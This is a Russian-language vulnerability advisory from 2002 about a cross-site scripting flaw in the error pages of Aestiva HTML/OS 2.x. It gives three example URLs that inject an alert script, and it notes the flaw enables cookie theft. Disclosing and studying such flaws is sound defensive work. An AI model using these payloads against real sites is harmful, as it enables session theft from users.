Межсайтовый скриптинг в Aestiva HTML/OS

Дата публикации:
06.09.2002
Всего просмотров:
551
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Aestiva HTML/OS 2.x
Описание: Aestiva HTML/OS – механизм базы данных и среда разработчика для создания Web сайтов и Web основанных программ.

HTML/OS не фильтрует метасимволы в страницах ошибки. Атакующий может создать злонамеренную ссылку, которая выполнит произвольный код сценария в контексте посещенного сайта. Уязвимость может использоваться для кражи куки или организации других атак.

Пример:

http://www.example.com/pages/htmlos/%3Cscript%3Ealert(document.domain);%3C/script%3E 
http://www.example.com/cgi-bin/erba/start/%3Cscript%3Ealert(document.domain);%3C/script%3E 
http://www.exmaple.com/cgi-bin/start.cgi/%3Cscript%3Ealert(document.domain);%3C/script%3E 
Уязвимость обнаружена в Aestiva HTML/OS 2.4

Ссылки: Cross-Site Scripting in Aestiva's HTML/OS
или введите имя

CAPTCHA